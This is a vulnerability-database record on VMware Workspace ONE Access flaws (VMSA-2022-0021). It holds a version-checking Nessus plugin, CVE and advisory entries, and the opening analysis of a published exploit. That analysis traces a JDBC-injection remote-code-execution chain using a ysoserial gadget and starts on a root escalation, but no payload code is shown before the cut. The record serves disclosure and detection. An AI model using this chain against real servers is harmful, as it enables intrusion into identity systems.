"2022-08-09T00:00:00", "type": "nessus", "title": "VMware Workspace One Access / VMware Identity Manager Multiple Vulnerabilities (VMSA-2022-0021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-31656", "CVE-2022-31657", "CVE-2022-31658", "CVE-2022-31659", "CVE-2022-31660", "CVE-2022-31661", "CVE-2022-31662", "CVE-2022-31663", "CVE-2022-31664", "CVE-2022-31665"], "modified": "2022-08-31T00:00:00", "cpe": ["cpe:/a:vmware:identity_manager", "cpe:/a:vmware:workspace_one_access"], "id": "VMWARE_WORKSPACE_ONE_ACCESS_VMSA-2022-0021.NASL", "href": "https://www.tenable.com/plugins/nessus/163939", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163939);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/31\");\n\n script_cve_id(\n \"CVE-2022-31656\",\n \"CVE-2022-31657\",\n \"CVE-2022-31658\",\n \"CVE-2022-31659\",\n \"CVE-2022-31660\",\n \"CVE-2022-31661\",\n \"CVE-2022-31662\",\n \"CVE-2022-31663\",\n \"CVE-2022-31664\",\n \"CVE-2022-31665\"\n );\n script_xref(name:\"VMSA\", value:\"2022-0021\");\n script_xref(name:\"IAVA\", value:\"2022-A-0303\");\n\n script_name(english:\"VMware Workspace One Access / VMware Identity Manager Multiple Vulnerabilities (VMSA-2022-0021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An identity store broker application running on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The VMware Workspace One Access (formerly VMware Identity Manager) application running on the remote host is affected\nby the following vulnerabilities:\n\n - An authentication bypass vulnerability affecting local domain users. A malicious actor with network access\n to the UI may be able to obtain administrative access without the need to authenticate. (CVE-2022-31656)\n\n - A remote code execution vulnerability. A malicious actor with administrator and network access can trigger\n a remote code execution. (CVE-2022-31658)\n\n - A remote code execution vulnerability. A malicious actor with administrator and network access can trigger\n a remote code execution. (CVE-2022-31659)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2022-0021.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://core.vmware.com/vmsa-2022-0021-questions-answers-faq\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.vmware.com/s/article/89096\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the HW-160130 hotfix to VMware Workspace One Access / VMware Identity Manager as per the VMSA-2022-0021 advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-31656\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'VMware Workspace ONE Access CVE-2022-31660');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/08/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/08/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/08/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:identity_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:workspace_one_access\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"false\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_workspace_one_access_web_detect.nbin\", \"vmware_workspace_one_access_installed.nbin\");\n script_require_keys(\"installed_sw/VMware Workspace ONE Access\");\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nvar app = 'VMware Workspace ONE Access';\n\nvar app_info = vcf::vmware_workspace_one_access::get_app_info(combined:TRUE);\n\n# 3.3.[3456] don't have fixed builds, so audit out unless we are doing a paranoid scan\n# Remote detection does not pull hotfixes. Require paranoia\nif ((app_info.webapp || app_info.version =~ \"3\\.3\\.[3456]\\.\") && report_paranoia < 2)\n audit(AUDIT_POTENTIAL_VULN, app, app_info.version);\n\nvar patch = '160130';\n\nvar constraints = [\n { 'min_version':'3.3.4.0.0', 'fixed_version':'3.3.7.0.0', 'fixed_display':'Refer to vendor advisory and apply patch HW-160130.' },\n\n { 'min_version':'19.03.0.1', 'max_version':'19.03.0.1.99999999', 'fixed_display':'19.03.0.1 with HW-160130' },\n \n { 'min_version':'21.08.0.0.0', 'max_version':'21.08.0.0.99999999', 'fixed_display':'21.08.0.0 with HW-160130' },\n { 'min_version':'21.08.0.1', 'max_version':'21.08.0.1.99999999', 'fixed_display':'21.08.0.1 with HW-160130' }\n];\n\nvcf::vmware_workspace_one_access::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, expected_patch:patch);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-08-11T18:57:07", "description": "VMware Workspace ONE Access, Identity Manager and vRealize Automation contain a remote code execution vulnerability. A malicious actor with administrator and network access can trigger a remote code execution.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-05T16:15:00", "type": "cve", "title": "CVE-2022-31658", "cwe": ["CWE-74"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-31658"], "modified": "2022-08-11T16:06:00", "cpe": ["cpe:/a:vmware:identity_manager:3.3.4", "cpe:/a:vmware:access_connector:21.08.0.1", "cpe:/a:vmware:identity_manager:3.3.6", "cpe:/a:vmware:one_access:21.08.0.1", "cpe:/a:vmware:access_connector:22.05", "cpe:/a:vmware:identity_manager:3.3.5", "cpe:/a:vmware:one_access:21.08.0.0", "cpe:/a:vmware:identity_manager_connector:19.03.0.1", "cpe:/a:vmware:identity_manager_connector:3.3.4", "cpe:/a:vmware:identity_manager_connector:3.3.6", "cpe:/a:vmware:identity_manager_connector:3.3.5", "cpe:/a:vmware:access_connector:21.08.0.0"], "id": "CVE-2022-31658", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-31658", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:a:vmware:identity_manager:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:19.03.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:access_connector:22.05:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:access_connector:21.08.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:one_access:21.08.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:access_connector:21.08.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:one_access:21.08.0.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-08-11T18:57:09", "description": "VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-05T16:15:00", "type": "cve", "title": "CVE-2022-31656", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-31656"], "modified": "2022-08-11T16:02:00", "cpe": ["cpe:/a:vmware:identity_manager:3.3.4", "cpe:/a:vmware:access_connector:21.08.0.1", "cpe:/a:vmware:identity_manager:3.3.6", "cpe:/a:vmware:one_access:21.08.0.1", "cpe:/a:vmware:access_connector:22.05", "cpe:/a:vmware:identity_manager:3.3.5", "cpe:/a:vmware:one_access:21.08.0.0", "cpe:/a:vmware:identity_manager_connector:19.03.0.1", "cpe:/a:vmware:identity_manager_connector:3.3.4", "cpe:/a:vmware:identity_manager_connector:3.3.6", "cpe:/a:vmware:identity_manager_connector:3.3.5", "cpe:/a:vmware:access_connector:21.08.0.0"], "id": "CVE-2022-31656", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-31656", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:a:vmware:identity_manager:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:19.03.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:access_connector:22.05:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:access_connector:21.08.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:one_access:21.08.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:access_connector:21.08.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:one_access:21.08.0.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-08-11T18:57:06", "description": "VMware Workspace ONE Access and Identity Manager contain a remote code execution vulnerability. A malicious actor with administrator and network access can trigger a remote code execution.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-05T16:15:00", "type": "cve", "title": "CVE-2022-31659", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-31659"], "modified": "2022-08-11T16:09:00", "cpe": ["cpe:/a:vmware:identity_manager:3.3.4", "cpe:/a:vmware:identity_manager:3.3.6", "cpe:/a:vmware:access_connector:22.08.0.0", "cpe:/a:vmware:one_access:21.08.0.1", "cpe:/a:vmware:access_connector:22.08.0.1", "cpe:/a:vmware:identity_manager:3.3.5", "cpe:/a:vmware:one_access:21.08.0.0", "cpe:/a:vmware:identity_manager_connector:19.03.0.1", "cpe:/a:vmware:identity_manager_connector:3.3.4", "cpe:/a:vmware:identity_manager_connector:3.3.6", "cpe:/a:vmware:identity_manager_connector:3.3.5", "cpe:/a:vmware:access_connector:22.05"], "id": "CVE-2022-31659", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-31659", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:a:vmware:identity_manager:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:19.03.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:access_connector:22.05:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:access_connector:22.08.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:access_connector:22.08.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:one_access:21.08.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:one_access:21.08.0.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-08-11T18:56:57", "description": "VMware Workspace ONE Access, Identity Manager and vRealize Automation contain a remote code execution vulnerability. A malicious actor with administrator and network access can trigger a remote code execution.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-05T16:15:00", "type": "cve", "title": "CVE-2022-31665", "cwe": ["CWE-74"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-31665"], "modified": "2022-08-11T16:14:00", "cpe": ["cpe:/a:vmware:identity_manager:3.3.4", "cpe:/a:vmware:identity_manager:3.3.6", "cpe:/a:vmware:one_access:21.08.0.1", "cpe:/a:vmware:identity_manager:3.3.5", "cpe:/a:vmware:one_access:21.08.0.0", "cpe:/a:vmware:identity_manager_connector:19.03.0.1", "cpe:/a:vmware:identity_manager_connector:3.3.4", "cpe:/a:vmware:identity_manager_connector:3.3.6", "cpe:/a:vmware:identity_manager_connector:3.3.5"], "id": "CVE-2022-31665", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-31665", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:a:vmware:identity_manager:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:19.03.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:one_access:21.08.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:one_access:21.08.0.1:*:*:*:*:*:*:*"]}], "checkpoint_advisories": [{"lastseen": "2022-10-13T22:36:08", "description": "An authentication bypass vulnerability exists in VMWare Workspace One Access. Successful exploitation of this vulnerability would allow a remote attacker to obtain sensitive information and gain unauthorized access to the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-30T00:00:00", "type": "checkpoint_advisories", "title": "VMWare Workspace One Access Authentication Bypass (CVE-2022-31656)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-31656"], "modified": "2022-08-30T00:00:00", "id": "CPAI-2022-0516", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-13T22:36:05", "description": "A remote code execution vulnerability exists in VMWare Workspace One Access. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-30T00:00:00", "type": "checkpoint_advisories", "title": "VMWare Workspace One Access Remote Code Execution (CVE-2022-31659)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-31659"], "modified": "2022-08-30T00:00:00", "id": "CPAI-2022-0522", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "srcincite": [{"lastseen": "2022-08-11T21:13:10", "description": "**Vulnerability Details:**\n\nThis vulnerability allows remote attackers to execute arbitrary code on affected installations of VMware Workspace ONE Access. Although authentication is required to exploit this vulnerability.\n\nThe specific flaw exists within ApplicationSetupController class. The issue results from the lack of proper validation of a user-supplied string before using it to perform a database connection. An attacker can leverage this vulnerability to execute code in the context of the horizon user.\n\n**Affected Vendors:**\n\nVMWare\n\n**Affected Products:**\n\nWorkspace ONE Access, Identity Manager, vRealize Automation\n\n**Vendor Response:**\n\nVMWare has issued an update to correct this vulnerability. More details can be found at: <https://www.vmware.com/security/advisories/VMSA-2022-0021.html>\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-12T00:00:00", "type": "srcincite", "title": "SRC-2022-0015 : VMware Workspace ONE Access ApplicationSetupController dbTestConnection JDBC Injection Remote Code Execution Vulnerability (patch bypass)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-4006", "CVE-2022-22958", "CVE-2022-31664", "CVE-2022-31665"], "modified": "2022-08-02T00:00:00", "id": "SRC-2022-0015", "href": "https://srcincite.io/advisories/src-2022-0015/", "sourceData": "#!/usr/bin/env python3\r\n\"\"\"\r\nVMware Workspace ONE Access ApplicationSetupController dbTestConnection JDBC Injection Remote Code Execution Exploit\r\nSteven Seeley of Qihoo 360 Vulnerability Research Institute\r\n\r\n# Summary:\r\n\r\nThis vulnerability allows a remote attacker authenticated as admin to execute remote code as horizon. The attacker can chain this with another vulnerability to achieve code execution as root.\r\n\r\n# Notes:\r\n\r\nThis is a patch bypass for CVE-2022-22958 chained with a new LPE exploit. VMware has patched the bugs in this report and released an advisory here: https://www.vmware.com/security/advisories/VMSA-2022-0021.html.\r\n\r\n# Vulnerability Analysis:\r\n\r\n## ApplicationSetupController dbTestConnection JDBC Injection (CVE-2022-31665)\r\n\r\nInside of the com.vmware.horizon.svadmin.controller.ApplicationSetupController we can see the following code:\r\n\r\n```java\r\n/* */ public AjaxResponse dbTestConnection(@RequestParam(\"jdbcurl\") String jdbcUrl, @RequestParam(\"dbUsername\") String dbUsername, @RequestParam(\"dbPassword\") String dbPassword) { try {\r\n/* 65 */ validateDbFields(jdbcUrl, dbUsername, dbPassword);\r\n/* 66 */ } catch (AdminPortalException e) {\r\n/* 67 */ return new AjaxResponse(Messages.getMessage(e.getErrorId(), e.getArgs()), Integer.valueOf(1), false);\r\n/* */ } \r\n/* */ \r\n/* */ try {\r\n/* 71 */ log.info(\"Testing database connection... jdbcUrl {}, dbUsername {}, passwordSet? {}\", new Object[] { jdbcUrl, dbUsername, \r\n/* 72 */ Boolean.valueOf(StringUtils.isNotBlank(dbPassword)) });\r\n/* 73 */ dbPassword = getDatabasePassword(dbPassword);\r\n/* 74 */ this.applicationSetupService.testDatabaseConnection(jdbcUrl, dbUsername, dbPassword); // 1 \r\n/* 75 */ } catch (AdminPortalException e) {\r\n/* 76 */ String error = null;\r\n/* 77 */ if (StringUtils.isNotBlank(e.getMessage())) {\r\n/* 78 */ error = this.applianceDiagnosticService.getLocalizedDBErrorMessages(e.getMessage());\r\n/* */ }\r\n/* */ \r\n/* 81 */ return new AjaxResponse(Messages.getMessage(\"configurator.configure.db.testFailed\", new Object[] { error\r\n/* 82 */ }), Integer.valueOf(2), false);\r\n/* */ } \r\n/* 84 */ return new AjaxResponse(Messages.getMessage(\"configurator.configure.db.testSuccess\"), Integer.valueOf(0), true); }\r\n```\r\n\r\nAt [1] the code calls `ApplicationSetupService.testDatabaseConnection`\r\n\r\n```java\r\n/* */ public void testDatabaseConnection(@NotNull String jdbcUrl, @NotNull String dbUsername, @NotNull String dbPassword, boolean checkCreateTableAccess) throws AdminPortalException {\r\n/* */ String[] cmd;\r\n/* 210 */ log.debug(\"Testing db connection params jdbcUrl: {}\", jdbcUrl);\r\n/* */ \r\n/* 212 */ String encryptedPwd = this.configEncrypter.encrypt(dbPassword);\r\n/* */ \r\n/* */ \r\n/* 215 */ dbUsername = AppliancePasswordService.escapeArg(dbUsername);\r\n/* 216 */ jdbcUrl = AppliancePasswordService.escapeArg(jdbcUrl);\r\n/* */ \r\n/* 218 */ if (Const.isWindowsDeployment) {\r\n/* 219 */ cmd = new String[] { COMMAND_SHELL, COMMAND_SHELL_ARG, \"\\\"\\\"\" + TEST_DB_CONNECTION_CMD + \"\\\"\" + \" \" + jdbcUrl + \" \" + dbUsername + \" \\\"\" + encryptedPwd + \"\\\" \" + checkCreateTableAccess + \"\\\"\" };\r\n/* */ } else {\r\n/* 221 */ cmd = new String[] { COMMAND_SHELL, COMMAND_SHELL_ARG, TEST_DB_CONNECTION_CMD + \" \" + jdbcUrl + \" \" + dbUsername + \" '\" + encryptedPwd + \"' \" + checkCreateTableAccess };\r\n/* */ } \r\n/* */ \r\n/* */ try {\r\n/* 225 */ CommandUtils.executeCommand(cmd); // 2\r\n/* 226 */ } catch (CommandException e) {\r\n/* 227 */ log.error(String.format(\"Error testing DB Connection with jdbc url: %s, user: %s.\", new Object[] { jdbcUrl, dbUsername }));\r\n/* 228 */ throw new AdminPortalException(StringUtils.removeStart(e.getStdOut(), \"ERROR:\").trim(), e);\r\n/* 229 */ } catch (IOException e) {\r\n/* 230 */ log.error(String.format(\"Error testing DB Connection with jdbc url: %s, user: %s.\", new Object[] { jdbcUrl, dbUsername }));\r\n/* 231 */ throw new AdminPortalException(e.getMessage(), e);\r\n/* */ } \r\n/* */ }\r\n```\r\n\r\nAt [2] the code executes the `/usr/local/horizon/bin/dbConnCheck` script which runs the following command. The `AppliancePasswordService.escapeArg` method is safe from injection attacks here (patch for CVE-2020-4006). Inside the script, we see the code drops privileges and calls `com.vmware.horizon.dbConnectionCheck.Main`:\r\n\r\n```sh\r\nif [[ $EUID -eq 0 ]]; then\r\n params=()\r\n for v in \"$@\" ; do\r\n params+=( $(escape \"$v\") )\r\n done\r\n su ${TOMCAT_USER} -c \"$JAVACMD $HZN_TOOL_OPTS -cp ${BC_JAR}:${ADMIN_JAR} com.vmware.horizon.dbConnectionCheck.Main ${params[*]}\" 2>/dev/null\r\nelse\r\n $JAVACMD $HZN_TOOL_OPTS -cp ${BC_JAR}:${ADMIN_JAR} com.vmware.horizon.dbConnectionCheck.Main $@ 2>/dev/null\r\nfi\r\n```\r\n\r\nThe resultant command is:\r\n\r\n```\r\nsu horizon -c /usr/java/jre-vmware/bin/java -Dlog4j.configurationFile=file:/usr/local/horizon/conf/saas-log4j.properties -Dcatalina.base=/opt/vmware/horizon/workspace -Didm.fips.mode.required=true -Djava.security.properties=/opt/vmware/horizon/workspace/conf/idm_fips.security -Dorg.bouncycastle.fips.approved_only=true -cp /usr/local/horizon/jre-endorsed/bc-fips-1.0.1.BC-FIPS-Certified.jar:/usr/local/horizon/jars/dbConnection-0.1-jar-with-dependencies.jar com.vmware.horizon.dbConnectionCheck.Maintrue 2>/dev/null\r\n```\r\n\r\nwhereis controlled by the attacker. This can lead to an attacker crafting a jdbc uri using specifying a mysql driver and trigger deserialization of untrusted data. The `CommonsBeanutils1` gadget from ysoserial will work to enable an attacker to gain remote code execution.\r\n\r\nBelow is the stack trace starting from the `com.vmware.horizon.dbConnectionCheck.Main` class that is executing a command (see poc.png):\r\n\r\n```\r\nProcessBuilder.start() line: 1007 [local variables unavailable]\t\r\nNativeMethodAccessorImpl.invoke0(Method, Object, Object[]) line: not available [native method]\t\r\nNativeMethodAccessorImpl.invoke(Object, Object[]) line: 62\t\r\nDelegatingMethodAccessorImpl.invoke(Object, Object[]) line: 43\t\r\nMethod.invoke(Object, Object...) line: 498\t\r\nReflectiveMethodExecutor.execute(EvaluationContext, Object, Object...) line: 129\t\r\nMethodReference.getValueInternal(EvaluationContext, Object, TypeDescriptor, Object[]) line: 139\t\r\nMethodReference.access$000(MethodReference, EvaluationContext, Object, TypeDescriptor, Object[]) line: 55\t\r\nMethodReference$MethodValueRef.getValue() line: 387\t\r\nCompoundExpression.getValueInternal(ExpressionState) line: 92\t\r\nCompoundExpression(SpelNodeImpl).getValue(ExpressionState) line: 112\t\r\nSpelExpression.getValue(EvaluationContext) line: 272\t\r\nStandardBeanExpressionResolver.evaluate(String, BeanExpressionContext) line: 166\t\r\nDefaultListableBeanFactory(AbstractBeanFactory).evaluateBeanDefinitionString(String, BeanDefinition) line: 1575\t\r\nBeanDefinitionValueResolver.doEvaluate(String) line: 280\t\r\nBeanDefinitionValueResolver.evaluate(TypedStringValue) line: 237\t\r\nBeanDefinitionValueResolver.resolveValueIfNecessary(Object, Object) line: 205\t\r\nDefaultListableBeanFactory(AbstractAutowireCapableBeanFactory).applyPropertyValues(String, BeanDefinition, BeanWrapper, PropertyValues) line: 1702\t\r\nDefaultListableBeanFactory(AbstractAutowireCapableBeanFactory).populateBean(String, RootBeanDefinition, BeanWrapper) line: 1447\t\r\nDefaultListableBeanFactory(AbstractAutowireCapableBeanFactory).doCreateBean(String, RootBeanDefinition, Object[]) line: 593\t\r\nDefaultListableBeanFactory(AbstractAutowireCapableBeanFactory).createBean(String, RootBeanDefinition, Object[]) line: 516\t\r\nDefaultListableBeanFactory(AbstractBeanFactory).lambda$doGetBean$0(String, RootBeanDefinition, Object[]) line: 324\t\r\n761923430.getObject() line: not available\t\r\nDefaultListableBeanFactory(DefaultSingletonBeanRegistry).getSingleton(String, ObjectFactory>) line: 234\t\r\nDefaultListableBeanFactory(AbstractBeanFactory).doGetBean(String, Class, Object[], boolean) line: 322\t\r\nDefaultListableBeanFactory(AbstractBeanFactory).getBean(String) line: 202\t\r\nDefaultListableBeanFactory.preInstantiateSingletons() line: 897\t\r\nFileSystemXmlApplicationContext(AbstractApplicationContext).finishBeanFactoryInitialization(ConfigurableListableBeanFactory) line: 879\t\r\nFileSystemXmlApplicationContext(AbstractApplicationContext).refresh() line: 551\t\r\nFileSystemXmlApplicationContext.(String[], boolean, ApplicationContext) line: 142\t\r\nFileSystemXmlApplicationContext.(String) line: 85\t\r\nNativeConstructorAccessorImpl.newInstance0(Constructor>, Object[]) line: not available [native method]\t\r\nNativeConstructorAccessorImpl.newInstance(Object[]) line: 62\t\r\nDelegatingConstructorAccessorImpl.newInstance(Object[]) line: 45\t\r\nConstructor.newInstance(Object...) line: 423\t\r\nObjectFactory.instantiate(String, Properties, boolean, String) line: 62\t\r\nSocketFactoryFactory.getSocketFactory(Properties) line: 39\t\r\nConnectionFactoryImpl.openConnectionImpl(HostSpec[], String, String, Properties) line: 182\t\r\nConnectionFactory.openConnection(HostSpec[], String, String, Properties) line: 51\t\r\nPgConnection.(HostSpec[], String, String, Properties, String) line: 223\t\r\nDriver.makeConnection(String, Properties) line: 465\t\r\nDriver.connect(String, Properties) line: 264\t\r\nDriverManager.getConnection(String, Properties, Class>) line: 664\t\r\nDriverManager.getConnection(String, String, String) line: 247\t\r\nDbConnectionCheckServiceImpl$FactoryHelper.getConnection(String, String, String) line: 444\t\r\nDbConnectionCheckServiceImpl.testConnection(String, String, String, boolean) line: 141\t\r\nDbConnectionCheckServiceImpl.checkConnection(String, String, String, boolean) line: 95\t\r\nMain.main(String[]) line: 61\t\r\n```\r\n\r\n## ntpServer.hzn Privilege Escalation Vulnerability (CVE-2022-31664)\r\n\r\nInside of the /etc/sudoers file we 